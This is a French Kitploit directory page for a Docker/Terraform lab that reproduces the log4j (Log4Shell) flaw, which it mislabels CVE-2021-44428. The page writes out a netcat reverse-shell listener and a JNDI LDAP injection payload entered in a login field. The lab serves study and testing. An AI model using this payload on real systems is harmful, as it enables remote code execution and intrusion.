Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
log4jtest — Terraform et ressources Docker pour monter rapidement un test de CVE-2021-44428 | Kitploit
Outils/GitHubGitHub/z3bul0n/log4jtest
Sécurité de l'Infrastructure CloudSécurité des ConteneursAnalyse des VulnérabilitésExploitationTests d'IntrusionApprentissage et Éducation
GitHubz3bul0n/log4jtest

log4jtest

Terraform et ressources Docker pour monter rapidement un test de CVE-2021-44428

Voir le dépôt
1il y a 4 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Introduction

Ce dépôt est configuré pour tester rapidement la vulnérabilité log4j à l'aide de Docker et de Hashicorp Terraform. Tous les composants de ce test s'exécuteront dans des conteneurs Docker sur le réseau Docker, accessibles via 'host.docker.internal'.

Crédits / Avertissement

Cet environnement de test est dérivé d'un excellent article de blog de Raxis : (https://raxis.com/blog/log4j-exploit)

L'application vulnérable et le code d'exploitation proviennent de cyberxml (https://github.com/cyberxml/log4j-poc).

Tout ce que j'ai fait, c'est codifier l'environnement pour qu'il soit facile à déployer et à tester cette délicieuse exploitation.

Je n'assume aucune responsabilité en cas d'effets indésirables ou d'actions malveillantes pouvant résulter de l'utilisation du contenu de ce dépôt. Point final. C'est à vous de décider si ces éléments sont dignes de confiance et il est également de votre responsabilité d'utiliser ces informations de manière éthique. Je publie simplement ces ressources afin que les chercheurs, les étudiants et les professionnels de la sécurité puissent créer rapidement un environnement et tester l'exploitation par eux-mêmes. Seacrest out.

Prérequis

  • Docker Desktop (https://www.docker.com/)
  • Hashicorp Terraform (https://www.terraform.io/)

Configuration

  • Clonez ce dépôt
  • Exécutez 'terraform init' dans le répertoire du projet
  • Démarrez le démon Docker
  • Exécutez le script bash 'docker-build.sh' pour construire toutes les images de conteneurs du projet.
  • Exécutez 'terraform apply' pour créer tous les conteneurs du projet.
  • Exploitation

    1. Ouvrez un shell dans le conteneur log4j_netcat à l'aide de 'docker exec -it netcat /bin/bash' ou d'une commande similaire. C'est ici que vous recevrez votre connexion shell vers le serveur victime une fois qu'elle sera établie.

    2. Dans votre session au sein du conteneur log4j_netcat, saisissez la commande suivante pour démarrer l'écouteur :

    root@kitploit:~
    nc -lv -s 0.0.0.0 -p 9001
    
    1. Dans votre navigateur, accédez à http://host.docker.internal:8080/log4shell/

    2. Saisissez ce qui suit dans le champ 'Username' ainsi que ce que vous voulez dans le champ 'Password' :

    root@kitploit:~
    ${jndi:ldap://host.docker.internal:1389/a}
    
    1. Revenez au shell du conteneur log4j_netcat et observez que vous êtes connecté au serveur victime.

    2. Allez semer le chaos !

    Télécharger l’outil